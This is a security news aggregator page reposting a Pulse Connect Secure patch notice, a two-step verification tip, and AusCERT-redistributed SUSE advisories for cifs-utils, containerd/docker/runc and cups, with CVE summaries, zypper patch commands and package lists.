Pulse Connect Secure Patch Availability – SA44784

Today, the Pulse Secure team released a security update to address the issue outlined in Security Advisory SA44784 (CVE-2021-22893) impacting Pulse Connect Secure appliance. We recommend that customers move quickly to apply the update to ensure they are protected. 

The post Pulse Connect Secure Patch Availability – SA44784 appeared first on Pulse Secure Blog.

The post Pulse Connect Secure Patch Availability – SA44784 appeared first on Security Boulevard.

Read More

The post Pulse Connect Secure Patch Availability – SA44784 appeared first on Malware Devil.

https://malwaredevil.com/2021/05/03/pulse-connect-secure-patch-availability-sa44784/?utm_source=rss&utm_medium=rss&utm_campaign=pulse-connect-secure-patch-availability-sa44784

Two-Step Verification

Two-step verification (also called two-factor authentication or 2FA) is one of the best steps you can take to secure any account. Two-step verification is when you require both a password and code sent to or generated by your mobile device. At a minimum enable two-step verification for your most important accounts such as email, financial and retirement accounts.
Read More

The post Two-Step Verification appeared first on Malware Devil.

https://malwaredevil.com/2021/05/03/two-step-verification/?utm_source=rss&utm_medium=rss&utm_campaign=two-step-verification

ESB-2021.1490 – [SUSE] cifs-utils: Multiple vulnerabilities

—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1490
Security update for cifs-utils
3 May 2021

===========================================================================

AusCERT Security Bulletin Summary
———————————

Product: cifs-utils
Publisher: SUSE
Operating System: SUSE
Impact/Access: Execute Arbitrary Code/Commands — Existing Account
Increased Privileges — Existing Account
Access Confidential Data — Existing Account
Resolution: Patch/Upgrade
CVE Names: CVE-2021-20208 CVE-2020-14342

Reference: ESB-2021.1238

Original Bulletin:
https://www.suse.com/support/update/announcement/2021/suse-su-20211455-1

– ————————–BEGIN INCLUDED TEXT——————–

SUSE Security Update: Security update for cifs-utils

______________________________________________________________________________

Announcement ID: SUSE-SU-2021:1455-1
Rating: important
References: #1152930 #1174477 #1183239 #1184815
Cross-References: CVE-2020-14342 CVE-2021-20208
Affected Products:
SUSE Linux Enterprise Server for SAP 15
SUSE Linux Enterprise Server 15-LTSS
SUSE Linux Enterprise High Performance Computing 15-LTSS
SUSE Linux Enterprise High Performance Computing 15-ESPOS
______________________________________________________________________________

An update that solves two vulnerabilities and has two fixes is now available.

Description:

This update for cifs-utils fixes the following security issues:

o CVE-2021-20208: Fixed a potential kerberos auth leak escaping from
container. (bsc#1183239)
o CVE-2020-14342: Fixed a shell command injection vulnerability in
mount.cifs. (bsc#1174477)

This update for cifs-utils fixes the following issues:

o Solve invalid directory mounting. When attempting to change the current
working directory into non-existing directories, mount.cifs crashes. (bsc#
1152930)

o Fixed a bug where it was no longer possible to mount CIFS filesystem after
the last maintenance update. (bsc#1184815)

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or “zypper patch”.
Alternatively you can run the command listed for your product:

o SUSE Linux Enterprise Server for SAP 15:
zypper in -t patch SUSE-SLE-Product-SLES_SAP-15-2021-1455=1
o SUSE Linux Enterprise Server 15-LTSS:
zypper in -t patch SUSE-SLE-Product-SLES-15-2021-1455=1
o SUSE Linux Enterprise High Performance Computing 15-LTSS:
zypper in -t patch SUSE-SLE-Product-HPC-15-2021-1455=1
o SUSE Linux Enterprise High Performance Computing 15-ESPOS:
zypper in -t patch SUSE-SLE-Product-HPC-15-2021-1455=1

Package List:

o SUSE Linux Enterprise Server for SAP 15 (ppc64le x86_64):
cifs-utils-6.9-3.14.1
cifs-utils-debuginfo-6.9-3.14.1
cifs-utils-debugsource-6.9-3.14.1
cifs-utils-devel-6.9-3.14.1
o SUSE Linux Enterprise Server 15-LTSS (aarch64 s390x):
cifs-utils-6.9-3.14.1
cifs-utils-debuginfo-6.9-3.14.1
cifs-utils-debugsource-6.9-3.14.1
cifs-utils-devel-6.9-3.14.1
o SUSE Linux Enterprise High Performance Computing 15-LTSS (aarch64 x86_64):
cifs-utils-6.9-3.14.1
cifs-utils-debuginfo-6.9-3.14.1
cifs-utils-debugsource-6.9-3.14.1
cifs-utils-devel-6.9-3.14.1
o SUSE Linux Enterprise High Performance Computing 15-ESPOS (aarch64 x86_64):
cifs-utils-6.9-3.14.1
cifs-utils-debuginfo-6.9-3.14.1
cifs-utils-debugsource-6.9-3.14.1
cifs-utils-devel-6.9-3.14.1

References:

o https://www.suse.com/security/cve/CVE-2020-14342.html
o https://www.suse.com/security/cve/CVE-2021-20208.html
o https://bugzilla.suse.com/1152930
o https://bugzilla.suse.com/1174477
o https://bugzilla.suse.com/1183239
o https://bugzilla.suse.com/1184815

– ————————–END INCLUDED TEXT——————–

You have received this e-mail bulletin as a result of your organisation’s
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT’s members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation’s
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author’s website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
—–BEGIN PGP SIGNATURE—–
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBYI9SIeNLKJtyKPYoAQj3Bg//cU3e0RrjwwXLf+HwVt2plYu8sjBg6Myl
9+ALHZ2lgUJhP4A29AIi5lzgImfaX7oFB9pXfJAipU/HBl+UQLZy9Ob4d+xyP113
BTPV/1lKEGrjxzETW91SqBS2woxYv5OYQU7MpOofE8ijDagJ6+uCD28M/3Qu1MHY
T41k0elvZrExSX67Y53C8c9ttknLM3vsjzjhM4PXVHXyps5Qr26EXyYUIOIsp2Mt
XvyWIfyO/MQFm/yqAvLS9w4Vv4zxsAa9AL88mHLeDHZlYg250CD8jVRBWqgIz4iQ
+TwZA1vAIlr4XlTiWsFoSGIb53mGwtxlwqeyAdcO8dP2hnxnOHOWz2kti6hTQQ28
C331Fsggq8WKuiTMwvIVbgAp4c7mHDiSITQf2q4tGPQlXJA3ROwRj6kzvODBypGy
vH/Zvghp99MlKF+lNZtYfh8snLC39m/fr14WNtBA5xtjqWcL9hCvV4GH/w3xgjwa
grhhrC0wCt8ht8VlUt3hpzJgIrWOZjzpH+etvNGg9tCH77aBhw4JqmRZgKu4NV0N
lDCMt9W9NarE4JztjzWSbbANtRK6VWGc4IbpUS+JYJPawsafDiwIzUQAP5PM4dqZ
QGFynH7ZC2Z5b6hI5QT+4asE7d9i5EB462OyWrvqaJlJ+/O2dbjgtrHZc1/lPePx
Dojjnj5tySc=
=IYOE
—–END PGP SIGNATURE—–

Read More

The post ESB-2021.1490 – [SUSE] cifs-utils: Multiple vulnerabilities appeared first on Malware Devil.

https://malwaredevil.com/2021/05/03/esb-2021-1490-suse-cifs-utils-multiple-vulnerabilities/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-1490-suse-cifs-utils-multiple-vulnerabilities

ESB-2021.1491 – [SUSE] containerd, docker and runc: Multiple vulnerabilities

—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1491
Security update for containerd, docke and runc
3 May 2021

===========================================================================

AusCERT Security Bulletin Summary
———————————

Product: containerd
docker
runc
Publisher: SUSE
Operating System: SUSE
Impact/Access: Execute Arbitrary Code/Commands — Remote/Unauthenticated
Root Compromise — Existing Account
Denial of Service — Remote/Unauthenticated
Access Confidential Data — Remote/Unauthenticated
Unauthorised Access — Existing Account
Resolution: Patch/Upgrade
CVE Names: CVE-2021-21334 CVE-2021-21285 CVE-2021-21284
CVE-2019-19921 CVE-2019-16884 CVE-2019-5736
CVE-2018-16875 CVE-2018-16874 CVE-2018-16873

Reference: ESB-2021.0891
ESB-2021.0734
ESB-2020.2186
ESB-2020.1505
ESB-2020.1231

Original Bulletin:
https://www.suse.com/support/update/announcement/2021/suse-su-20211458-1

– ————————–BEGIN INCLUDED TEXT——————–

SUSE Security Update: Security update for containerd, docker, runc

______________________________________________________________________________

Announcement ID: SUSE-SU-2021:1458-1
Rating: important
References: #1028638 #1034053 #1048046 #1051429 #1053532 #1095817
#1118897 #1118898 #1118899 #1121967 #1131314 #1131553
#1149954 #1152308 #1160452 #1168481 #1175081 #1175821
#1181594 #1181641 #1181677 #1181730 #1181732 #1181749
#1182451 #1182476 #1182947 #1183024 #1183397 #1183855
#1184768 #1184962
Cross-References: CVE-2018-16873 CVE-2018-16874 CVE-2018-16875 CVE-2019-16884
CVE-2019-19921 CVE-2019-5736 CVE-2021-21284 CVE-2021-21285
CVE-2021-21334
Affected Products:
SUSE Linux Enterprise Module for Containers 12
______________________________________________________________________________

An update that solves 9 vulnerabilities and has 23 fixes is now available.

Description:

This update for containerd, docker, runc fixes the following issues:

o Docker was updated to 20.10.6-ce * Switch version to use -ce suffix rather
than _ce to avoid confusing other tools (bsc#1182476). * CVE-2021-21284:
Fixed a potential privilege escalation when the root user in the remapped
namespace has access to the host filesystem (bsc#1181732) * CVE-2021-21285:
Fixed an issue where pulling a malformed Docker image manifest crashes the
dockerd daemon (bsc#1181730).

o runc was updated to v1.0.0~rc93 (bsc#1182451 and bsc#1184962). * Use the
upstream runc package (bsc#1181641, bsc#1181677, bsc#1175821). * Fixed /dev
/null is not available (bsc#1168481). * Fixed an issue where podman hangs
when spawned by salt-minion process (bsc#1149954). * CVE-2019-19921: Fixed
a race condition with shared mounts (bsc#1160452). * CVE-2019-16884: Fixed
an LSM bypass via malicious Docker image that mount over a /proc directory
(bsc#1152308). * CVE-2019-5736: Fixed potential write attacks to the host
runc binary (bsc#1121967). * Fixed an issue where after a kernel-update
docker doesn’t run (bsc#1131314 bsc#1131553) * Ensure that we always
include the version information in runc (bsc#1053532).

o Switch to Go 1.13 for build. * CVE-2018-16873: Fixed a potential remote
code execution (bsc#1118897). * CVE-2018-16874: Fixed a directory traversal
in “go get” via curly braces in import paths (bsc#1118898). *
CVE-2018-16875: Fixed a CPU denial of service (bsc#1118899). * Fixed an
issue with building containers (bsc#1095817).

o containerd was updated to v1.4.4 * CVE-2021-21334: Fixed a potential
information leak through environment variables (bsc#1183397). * Handle a
requirement from docker (bsc#1181594). * Install the containerd-shim*
binaries and stop creating (bsc#1183024). * update version to the one
required by docker (bsc#1034053)

o Use -buildmode=pie for tests and binary build (bsc#1048046, bsc#1051429)
o Cleanup seccomp builds similar (bsc#1028638).
o Update to handle the docker-runc removal, and drop the -kubic flavour (bsc#
1181677, bsc#1181749)

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or “zypper patch”.
Alternatively you can run the command listed for your product:

o SUSE Linux Enterprise Module for Containers 12:
zypper in -t patch SUSE-SLE-Module-Containers-12-2021-1458=1

Package List:

o SUSE Linux Enterprise Module for Containers 12 (ppc64le s390x x86_64):
containerd-1.4.4-16.38.1
docker-20.10.6_ce-98.66.1
docker-debuginfo-20.10.6_ce-98.66.1
runc-1.0.0~rc93-16.8.1
runc-debuginfo-1.0.0~rc93-16.8.1

References:

o https://www.suse.com/security/cve/CVE-2018-16873.html
o https://www.suse.com/security/cve/CVE-2018-16874.html
o https://www.suse.com/security/cve/CVE-2018-16875.html
o https://www.suse.com/security/cve/CVE-2019-16884.html
o https://www.suse.com/security/cve/CVE-2019-19921.html
o https://www.suse.com/security/cve/CVE-2019-5736.html
o https://www.suse.com/security/cve/CVE-2021-21284.html
o https://www.suse.com/security/cve/CVE-2021-21285.html
o https://www.suse.com/security/cve/CVE-2021-21334.html
o https://bugzilla.suse.com/1028638
o https://bugzilla.suse.com/1034053
o https://bugzilla.suse.com/1048046
o https://bugzilla.suse.com/1051429
o https://bugzilla.suse.com/1053532
o https://bugzilla.suse.com/1095817
o https://bugzilla.suse.com/1118897
o https://bugzilla.suse.com/1118898
o https://bugzilla.suse.com/1118899
o https://bugzilla.suse.com/1121967
o https://bugzilla.suse.com/1131314
o https://bugzilla.suse.com/1131553
o https://bugzilla.suse.com/1149954
o https://bugzilla.suse.com/1152308
o https://bugzilla.suse.com/1160452
o https://bugzilla.suse.com/1168481
o https://bugzilla.suse.com/1175081
o https://bugzilla.suse.com/1175821
o https://bugzilla.suse.com/1181594
o https://bugzilla.suse.com/1181641
o https://bugzilla.suse.com/1181677
o https://bugzilla.suse.com/1181730
o https://bugzilla.suse.com/1181732
o https://bugzilla.suse.com/1181749
o https://bugzilla.suse.com/1182451
o https://bugzilla.suse.com/1182476
o https://bugzilla.suse.com/1182947
o https://bugzilla.suse.com/1183024
o https://bugzilla.suse.com/1183397
o https://bugzilla.suse.com/1183855
o https://bugzilla.suse.com/1184768
o https://bugzilla.suse.com/1184962

– ————————–END INCLUDED TEXT——————–

You have received this e-mail bulletin as a result of your organisation’s
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT’s members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation’s
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author’s website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
—–BEGIN PGP SIGNATURE—–
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBYI9SQ+NLKJtyKPYoAQgLbA//V7PZYFhgC+VYUGnx4x1nt0QeKrz7pfOh
OtCP9MgEodakL/ShdwCbamYJ5dgEKDYmQO9h73xTYfErOtDIG10ssi/IE1msNARm
Jn3Z6EyRT5QPArJUgc00hb6RDxvU3HPpwo+XI5IfS8dhIyNPFrnDt4bVc/ZGyH9M
DRWJiPb+K99diV3u9BkoeMl7vbINWORF+k+mAyxYhqamWUxUj6swe7v8KOKCkxlK
RcA4cXPcE4jREvsVfhW/KdBWoQu7PPfRc9pTkvN6Ph5jVRjYaRtCn8IQHUB30oY5
gLc/duwJTek5V0/nqDCVkyZl7L7h7luoFnzPXPrFzbBZ8Z6tYXSA9u3aXlA0QgWp
Ul9PAdS2RLdtKcufKsGJBier6y5rdcCdvZAm3KwXNL3+pvztEl+zwvIp/Su3IUiP
+QWsxq5wp1l2u7hNE1rA6rcdD/B3nzA5dqQH//H0o/d8UNS0NK212RzWhvqYHl/T
LD2ZSIHIDtYe9ju6B1SEq6Bg3N6sUZSjTu0AmDDV3v6iJp2ToiLksoc0SirvS+HA
dC3P//r0UYKB1dRvfGrvEFauZRnnRtwxvXRNx30bTHXwcA7Fl7/yn69Rn9Y/QzjK
+26nTz0+TDUsCbnKwtSbMbnWsbdbhRK5Hsf9jIOWTTEZFamzPMQkgYPqu2L6eajT
GyBmJpPWrek=
=HG/k
—–END PGP SIGNATURE—–

Read More

The post ESB-2021.1491 – [SUSE] containerd, docker and runc: Multiple vulnerabilities appeared first on Malware Devil.

https://malwaredevil.com/2021/05/03/esb-2021-1491-suse-containerd-docker-and-runc-multiple-vulnerabilities/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-1491-suse-containerd-docker-and-runc-multiple-vulnerabilities

ESB-2021.1492 – [Win][UNIX/Linux][SUSE] cups: Root compromise – Existing account

—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1492
Security update for cups
3 May 2021

===========================================================================

AusCERT Security Bulletin Summary
———————————

Product: cups
Publisher: SUSE
Operating System: SUSE
UNIX variants (UNIX, Linux, OSX)
Windows
Impact/Access: Root Compromise — Existing Account
Resolution: Patch/Upgrade
CVE Names: CVE-2021-25317

Original Bulletin:
https://www.suse.com/support/update/announcement/2021/suse-su-20211454-1
https://www.suse.com/support/update/announcement/2021/suse-su-202114712-1
https://www.suse.com/support/update/announcement/2021/suse-su-20211453-1

Comment: This advisory references vulnerabilities in products which run on
platforms other than SUSE. It is recommended that administrators
running cups check for an updated version of the software for their
operating system.

This bulletin contains three (3) SUSE security advisories.

– ————————–BEGIN INCLUDED TEXT——————–

SUSE Security Update: Security update for cups

______________________________________________________________________________

Announcement ID: SUSE-SU-2021:1454-1
Rating: important
References: #1184161
Cross-References: CVE-2021-25317
Affected Products:
SUSE Manager Server 4.0
SUSE Manager Retail Branch Server 4.0
SUSE Manager Proxy 4.0
SUSE Linux Enterprise Server for SAP 15-SP1
SUSE Linux Enterprise Server for SAP 15
SUSE Linux Enterprise Server 15-SP1-LTSS
SUSE Linux Enterprise Server 15-SP1-BCL
SUSE Linux Enterprise Server 15-LTSS
SUSE Linux Enterprise Module for Development Tools 15-SP3
SUSE Linux Enterprise Module for Development Tools 15-SP2
SUSE Linux Enterprise Module for Basesystem 15-SP3
SUSE Linux Enterprise Module for Basesystem 15-SP2
SUSE Linux Enterprise High Performance Computing 15-SP1-LTSS
SUSE Linux Enterprise High Performance Computing 15-SP1-ESPOS
SUSE Linux Enterprise High Performance Computing 15-LTSS
SUSE Linux Enterprise High Performance Computing 15-ESPOS
SUSE Enterprise Storage 6
SUSE CaaS Platform 4.0
______________________________________________________________________________

An update that fixes one vulnerability is now available.

Description:

This update for cups fixes the following issues:

o CVE-2021-25317: ownership of /var/log/cups could allow privilege escalation
from lp user to root via symlink attacks (bsc#1184161)

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or “zypper patch”.
Alternatively you can run the command listed for your product:

o SUSE Manager Server 4.0:
zypper in -t patch SUSE-SLE-Product-SUSE-Manager-Server-4.0-2021-1454=1
o SUSE Manager Retail Branch Server 4.0:
zypper in -t patch
SUSE-SLE-Product-SUSE-Manager-Retail-Branch-Server-4.0-2021-1454=1
o SUSE Manager Proxy 4.0:
zypper in -t patch SUSE-SLE-Product-SUSE-Manager-Proxy-4.0-2021-1454=1
o SUSE Linux Enterprise Server for SAP 15-SP1:
zypper in -t patch SUSE-SLE-Product-SLES_SAP-15-SP1-2021-1454=1
o SUSE Linux Enterprise Server for SAP 15:
zypper in -t patch SUSE-SLE-Product-SLES_SAP-15-2021-1454=1
o SUSE Linux Enterprise Server 15-SP1-LTSS:
zypper in -t patch SUSE-SLE-Product-SLES-15-SP1-LTSS-2021-1454=1
o SUSE Linux Enterprise Server 15-SP1-BCL:
zypper in -t patch SUSE-SLE-Product-SLES-15-SP1-BCL-2021-1454=1
o SUSE Linux Enterprise Server 15-LTSS:
zypper in -t patch SUSE-SLE-Product-SLES-15-2021-1454=1
o SUSE Linux Enterprise Module for Development Tools 15-SP3:
zypper in -t patch SUSE-SLE-Module-Development-Tools-15-SP3-2021-1454=1
o SUSE Linux Enterprise Module for Development Tools 15-SP2:
zypper in -t patch SUSE-SLE-Module-Development-Tools-15-SP2-2021-1454=1
o SUSE Linux Enterprise Module for Basesystem 15-SP3:
zypper in -t patch SUSE-SLE-Module-Basesystem-15-SP3-2021-1454=1
o SUSE Linux Enterprise Module for Basesystem 15-SP2:
zypper in -t patch SUSE-SLE-Module-Basesystem-15-SP2-2021-1454=1
o SUSE Linux Enterprise High Performance Computing 15-SP1-LTSS:
zypper in -t patch SUSE-SLE-Product-HPC-15-SP1-LTSS-2021-1454=1
o SUSE Linux Enterprise High Performance Computing 15-SP1-ESPOS:
zypper in -t patch SUSE-SLE-Product-HPC-15-SP1-ESPOS-2021-1454=1
o SUSE Linux Enterprise High Performance Computing 15-LTSS:
zypper in -t patch SUSE-SLE-Product-HPC-15-2021-1454=1
o SUSE Linux Enterprise High Performance Computing 15-ESPOS:
zypper in -t patch SUSE-SLE-Product-HPC-15-2021-1454=1
o SUSE Enterprise Storage 6:
zypper in -t patch SUSE-Storage-6-2021-1454=1
o SUSE CaaS Platform 4.0:
To install this update, use the SUSE CaaS Platform ‘skuba’ tool. I will
inform you if it detects new updates and let you then trigger updating of
the complete cluster in a controlled way.

Package List:

o SUSE Manager Server 4.0 (ppc64le s390x x86_64):
cups-2.2.7-3.26.1
cups-client-2.2.7-3.26.1
cups-client-debuginfo-2.2.7-3.26.1
cups-config-2.2.7-3.26.1
cups-ddk-2.2.7-3.26.1
cups-ddk-debuginfo-2.2.7-3.26.1
cups-debuginfo-2.2.7-3.26.1
cups-debugsource-2.2.7-3.26.1
cups-devel-2.2.7-3.26.1
libcups2-2.2.7-3.26.1
libcups2-debuginfo-2.2.7-3.26.1
libcupscgi1-2.2.7-3.26.1
libcupscgi1-debuginfo-2.2.7-3.26.1
libcupsimage2-2.2.7-3.26.1
libcupsimage2-debuginfo-2.2.7-3.26.1
libcupsmime1-2.2.7-3.26.1
libcupsmime1-debuginfo-2.2.7-3.26.1
libcupsppdc1-2.2.7-3.26.1
libcupsppdc1-debuginfo-2.2.7-3.26.1
o SUSE Manager Server 4.0 (x86_64):
libcups2-32bit-2.2.7-3.26.1
libcups2-32bit-debuginfo-2.2.7-3.26.1
o SUSE Manager Retail Branch Server 4.0 (x86_64):
cups-2.2.7-3.26.1
cups-client-2.2.7-3.26.1
cups-client-debuginfo-2.2.7-3.26.1
cups-config-2.2.7-3.26.1
cups-ddk-2.2.7-3.26.1
cups-ddk-debuginfo-2.2.7-3.26.1
cups-debuginfo-2.2.7-3.26.1
cups-debugsource-2.2.7-3.26.1
cups-devel-2.2.7-3.26.1
libcups2-2.2.7-3.26.1
libcups2-32bit-2.2.7-3.26.1
libcups2-32bit-debuginfo-2.2.7-3.26.1
libcups2-debuginfo-2.2.7-3.26.1
libcupscgi1-2.2.7-3.26.1
libcupscgi1-debuginfo-2.2.7-3.26.1
libcupsimage2-2.2.7-3.26.1
libcupsimage2-debuginfo-2.2.7-3.26.1
libcupsmime1-2.2.7-3.26.1
libcupsmime1-debuginfo-2.2.7-3.26.1
libcupsppdc1-2.2.7-3.26.1
libcupsppdc1-debuginfo-2.2.7-3.26.1
o SUSE Manager Proxy 4.0 (x86_64):
cups-2.2.7-3.26.1
cups-client-2.2.7-3.26.1
cups-client-debuginfo-2.2.7-3.26.1
cups-config-2.2.7-3.26.1
cups-ddk-2.2.7-3.26.1
cups-ddk-debuginfo-2.2.7-3.26.1
cups-debuginfo-2.2.7-3.26.1
cups-debugsource-2.2.7-3.26.1
cups-devel-2.2.7-3.26.1
libcups2-2.2.7-3.26.1
libcups2-32bit-2.2.7-3.26.1
libcups2-32bit-debuginfo-2.2.7-3.26.1
libcups2-debuginfo-2.2.7-3.26.1
libcupscgi1-2.2.7-3.26.1
libcupscgi1-debuginfo-2.2.7-3.26.1
libcupsimage2-2.2.7-3.26.1
libcupsimage2-debuginfo-2.2.7-3.26.1
libcupsmime1-2.2.7-3.26.1
libcupsmime1-debuginfo-2.2.7-3.26.1
libcupsppdc1-2.2.7-3.26.1
libcupsppdc1-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise Server for SAP 15-SP1 (ppc64le x86_64):
cups-2.2.7-3.26.1
cups-client-2.2.7-3.26.1
cups-client-debuginfo-2.2.7-3.26.1
cups-config-2.2.7-3.26.1
cups-ddk-2.2.7-3.26.1
cups-ddk-debuginfo-2.2.7-3.26.1
cups-debuginfo-2.2.7-3.26.1
cups-debugsource-2.2.7-3.26.1
cups-devel-2.2.7-3.26.1
libcups2-2.2.7-3.26.1
libcups2-debuginfo-2.2.7-3.26.1
libcupscgi1-2.2.7-3.26.1
libcupscgi1-debuginfo-2.2.7-3.26.1
libcupsimage2-2.2.7-3.26.1
libcupsimage2-debuginfo-2.2.7-3.26.1
libcupsmime1-2.2.7-3.26.1
libcupsmime1-debuginfo-2.2.7-3.26.1
libcupsppdc1-2.2.7-3.26.1
libcupsppdc1-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise Server for SAP 15-SP1 (x86_64):
libcups2-32bit-2.2.7-3.26.1
libcups2-32bit-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise Server for SAP 15 (ppc64le x86_64):
cups-2.2.7-3.26.1
cups-client-2.2.7-3.26.1
cups-client-debuginfo-2.2.7-3.26.1
cups-config-2.2.7-3.26.1
cups-ddk-2.2.7-3.26.1
cups-ddk-debuginfo-2.2.7-3.26.1
cups-debuginfo-2.2.7-3.26.1
cups-debugsource-2.2.7-3.26.1
cups-devel-2.2.7-3.26.1
libcups2-2.2.7-3.26.1
libcups2-debuginfo-2.2.7-3.26.1
libcupscgi1-2.2.7-3.26.1
libcupscgi1-debuginfo-2.2.7-3.26.1
libcupsimage2-2.2.7-3.26.1
libcupsimage2-debuginfo-2.2.7-3.26.1
libcupsmime1-2.2.7-3.26.1
libcupsmime1-debuginfo-2.2.7-3.26.1
libcupsppdc1-2.2.7-3.26.1
libcupsppdc1-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise Server for SAP 15 (x86_64):
libcups2-32bit-2.2.7-3.26.1
libcups2-32bit-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise Server 15-SP1-LTSS (aarch64 ppc64le s390x x86_64):
cups-2.2.7-3.26.1
cups-client-2.2.7-3.26.1
cups-client-debuginfo-2.2.7-3.26.1
cups-config-2.2.7-3.26.1
cups-ddk-2.2.7-3.26.1
cups-ddk-debuginfo-2.2.7-3.26.1
cups-debuginfo-2.2.7-3.26.1
cups-debugsource-2.2.7-3.26.1
cups-devel-2.2.7-3.26.1
libcups2-2.2.7-3.26.1
libcups2-debuginfo-2.2.7-3.26.1
libcupscgi1-2.2.7-3.26.1
libcupscgi1-debuginfo-2.2.7-3.26.1
libcupsimage2-2.2.7-3.26.1
libcupsimage2-debuginfo-2.2.7-3.26.1
libcupsmime1-2.2.7-3.26.1
libcupsmime1-debuginfo-2.2.7-3.26.1
libcupsppdc1-2.2.7-3.26.1
libcupsppdc1-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise Server 15-SP1-LTSS (x86_64):
libcups2-32bit-2.2.7-3.26.1
libcups2-32bit-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise Server 15-SP1-BCL (x86_64):
cups-2.2.7-3.26.1
cups-client-2.2.7-3.26.1
cups-client-debuginfo-2.2.7-3.26.1
cups-config-2.2.7-3.26.1
cups-ddk-2.2.7-3.26.1
cups-ddk-debuginfo-2.2.7-3.26.1
cups-debuginfo-2.2.7-3.26.1
cups-debugsource-2.2.7-3.26.1
cups-devel-2.2.7-3.26.1
libcups2-2.2.7-3.26.1
libcups2-32bit-2.2.7-3.26.1
libcups2-32bit-debuginfo-2.2.7-3.26.1
libcups2-debuginfo-2.2.7-3.26.1
libcupscgi1-2.2.7-3.26.1
libcupscgi1-debuginfo-2.2.7-3.26.1
libcupsimage2-2.2.7-3.26.1
libcupsimage2-debuginfo-2.2.7-3.26.1
libcupsmime1-2.2.7-3.26.1
libcupsmime1-debuginfo-2.2.7-3.26.1
libcupsppdc1-2.2.7-3.26.1
libcupsppdc1-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise Server 15-LTSS (aarch64 s390x):
cups-2.2.7-3.26.1
cups-client-2.2.7-3.26.1
cups-client-debuginfo-2.2.7-3.26.1
cups-config-2.2.7-3.26.1
cups-ddk-2.2.7-3.26.1
cups-ddk-debuginfo-2.2.7-3.26.1
cups-debuginfo-2.2.7-3.26.1
cups-debugsource-2.2.7-3.26.1
cups-devel-2.2.7-3.26.1
libcups2-2.2.7-3.26.1
libcups2-debuginfo-2.2.7-3.26.1
libcupscgi1-2.2.7-3.26.1
libcupscgi1-debuginfo-2.2.7-3.26.1
libcupsimage2-2.2.7-3.26.1
libcupsimage2-debuginfo-2.2.7-3.26.1
libcupsmime1-2.2.7-3.26.1
libcupsmime1-debuginfo-2.2.7-3.26.1
libcupsppdc1-2.2.7-3.26.1
libcupsppdc1-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise Module for Development Tools 15-SP3 (aarch64 ppc64le
s390x x86_64):
cups-ddk-2.2.7-3.26.1
cups-ddk-debuginfo-2.2.7-3.26.1
cups-debuginfo-2.2.7-3.26.1
cups-debugsource-2.2.7-3.26.1
o SUSE Linux Enterprise Module for Development Tools 15-SP2 (aarch64 ppc64le
s390x x86_64):
cups-ddk-2.2.7-3.26.1
cups-ddk-debuginfo-2.2.7-3.26.1
cups-debuginfo-2.2.7-3.26.1
cups-debugsource-2.2.7-3.26.1
o SUSE Linux Enterprise Module for Basesystem 15-SP3 (aarch64 ppc64le s390x
x86_64):
cups-2.2.7-3.26.1
cups-client-2.2.7-3.26.1
cups-client-debuginfo-2.2.7-3.26.1
